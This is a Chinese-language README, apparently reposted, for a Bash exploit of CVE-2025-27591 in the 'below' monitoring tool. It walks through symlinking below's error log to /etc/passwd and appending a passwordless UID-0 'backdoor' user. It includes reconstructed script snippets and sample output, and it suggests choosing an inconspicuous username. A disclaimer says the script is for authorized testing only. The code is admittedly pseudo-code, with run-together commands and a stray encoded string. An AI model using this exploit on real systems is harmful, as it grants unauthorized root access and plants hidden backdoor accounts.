CVE-2025-27591 Exploit - Below Logger Symlink Attack

项目标题与描述

CVE-2025-27591 Below日志符号链接攻击利用工具

本项目是一个基于Bash的权限提升漏洞利用脚本，专门针对Facebook开发的系统性能监控工具below。该工具利用below在日志记录机制中存在的一个符号链接漏洞（CVE-2025-27591），通过向/etc/passwd文件注入具有root权限的用户条目，从而获取完整的root系统访问权限。

该漏洞由Matthias Gerstney发现并报告给SUSE安全团队。

功能特性

根据代码分析，本利用工具具有以下核心功能：

• 自动化漏洞检测：自动检查目标系统上/var/log/below日志目录是否全局可写，这是漏洞存在的必要条件。
• 符号链接创建与管理：自动删除可能存在的旧日志文件，并创建从/var/log/below/error_root.log到/etc/passwd的符号链接。
• 权限提升注入：通过触发below record命令产生错误日志，该日志会被写入符号链接指向的/etc/passwd文件。脚本随后会手动向/etc/passwd文件尾部追加一个精心构造的用户行，该用户具有root权限（UID=0）和空密码，从而实现提权。
• 智能回退与清理：包含失败重试机制（如below命令不存在时的回退方案），并在利用成功后提供清理已添加用户的指导。
• 详细流程输出：脚本执行过程中会输出详细的步骤说明、状态检查和利用结果，方便用户了解执行进度。

安装指南

此项目为独立的Bash脚本利用工具，无需复杂的安装过程。

系统要求与依赖项：

1. 操作系统：基于Linux的系统（因为利用了特定的路径/etc/passwd和/var/log/below）。
2. 目标环境：系统中必须安装了存在漏洞版本的below工具，并且其日志目录/var/log/below的权限设置不当（全局可写）。
3. 脚本解释器：需要bash环境来执行脚本。
4. 必要权限：执行脚本的用户需要具备在/var/log/below目录下创建和删除文件的权限（这通常意味着该目录是全局可写的）。
5. 工具依赖：脚本尝试使用below命令来触发漏洞，并使用了sudo、useradd等系统命令进行权限检查和用户管理。

“安装”步骤：
实际上，你只需要获取脚本文件并确保其具有可执行权限即可。

# 1. 克隆或下载脚本文件（假设文件名为 exploit.sh）# 2. 赋予脚本执行权限chmod+x exploit.sh# 3. 在存在漏洞的环境中执行./exploit.sh

重要警告：此脚本仅用于授权下的安全测试、教育和研究目的。在未经许可的系统上使用是非法且不道德的。

使用说明

执行脚本后，它会引导你完成整个利用过程。

1. 启动脚本：在终端中运行脚本。
2. 提供用户名：脚本首先会提示你输入一个用于提权的用户名。你可以选择一个不容易被注意到的名字。
3. 自动化检测与利用：脚本随后会自动执行以下步骤：
   • 检查漏洞存在的条件（日志目录权限）。
   • 创建必要的符号链接。
   • 尝试触发below记录错误。
   • 向/etc/passwd文件注入具有root权限的用户。
4. 获取Root Shell：如果利用成功，脚本会显示如何使用新创建的用户通过su命令切换到root权限。
5. 清理（手动）：脚本在最后会提示你，成功提权后需要手动编辑/etc/passwd文件，删除添加的那一行以进行清理。

典型使用场景代码片段提示：

脚本运行后，你会看到类似以下的交互过程（具体输出取决于脚本内容）：

$ ./exploit.sh[+]Welcome to the CVE-2025-27591 exploit![?]Please enter your desired backdoor username: testroot[+]Checkingif/var/log/below is world-writable...[+]Directory is vulnerable![+]Removing existing error_root.log...[+]Creating symlink from error_root.log to /etc/passwd...[+]Triggering below record towriteto symlink...[+]Manually injecting user entry into /etc/passwd...[+]Exploit successful!User'testroot'added withUID0.[+]Spawn root shell with:sutestroot[!]Remember to remove the added line from /etc/passwd after exploitation.

核心代码

由于提供的代码片段不完整，无法展示完整的核心代码及其注释。但根据项目描述和功能分析，其核心逻辑主要围绕以下几个关键操作，我们可以用伪代码和说明来概括：

1. 漏洞条件检查

# 检查日志目录是否全局可写，这是攻击的前提if[-w /var/log/below]&&[$(stat-c %a /var/log/below)-ge722];thenecho"[+] Directory is vulnerable!"elseecho"[-] Exploit condition not met. Exiting."exit1fi

2. 创建符号链接

# 移除可能存在的旧日志文件，创建指向/etc/passwd的符号链接rm-f /var/log/below/error_root.logln-s /etc/passwd /var/log/below/error_root.log# 验证链接是否创建成功if[-L /var/log/below/error_root.log];thenecho"[+] Symlink created successfully."fi

3. 触发漏洞并注入用户

# 尝试运行below命令以触发错误日志写入（写入符号链接指向的/etc/passwd）below record2>/dev/null||true# 关键步骤：手动向/etc/passwd文件尾部追加一个root用户条目# 格式：username:password:UID:GID:comment:home:shell# 这里使用“：：”表示空密码字段，UID为0表示root权限。echo"$BACKDOOR_USER::0:0::/root:/bin/bash">>/etc/passwdecho"[+] User '$BACKDOOR_USER' injected into /etc/passwd with UID 0."

4. 提权与清理提示

# 提示用户如何使用新创建的用户获得root shellecho"[+] To gain root access, run: su$BACKDOOR_USER"# 在密码提示符下直接按回车（因为密码字段为空）。echo"[!] IMPORTANT: After successful exploitation, manually edit /etc/passwd to remove the line for '$BACKDOOR_USER'."

代码注释要点：

• 实际的脚本应该包含详细的注释，解释每个步骤的目的，例如：“# 创建符号链接，将日志错误重定向到系统密码文件”。
• 应该包含错误处理，例如检查ln -s或echo >>命令是否执行成功。
• 可能包含对below命令是否存在的检查，并提供替代的触发方法（如直接向文件写入特定内容模拟错误日志）。
  6HFtX5dABrKlqXeO5PUv/9bhuFNUCg+u49PD61kHBnrwPPyofXGUNXhJ6l7AddsFDFtkcTtjRSv8RaXpQxzLag==
  更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
  对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）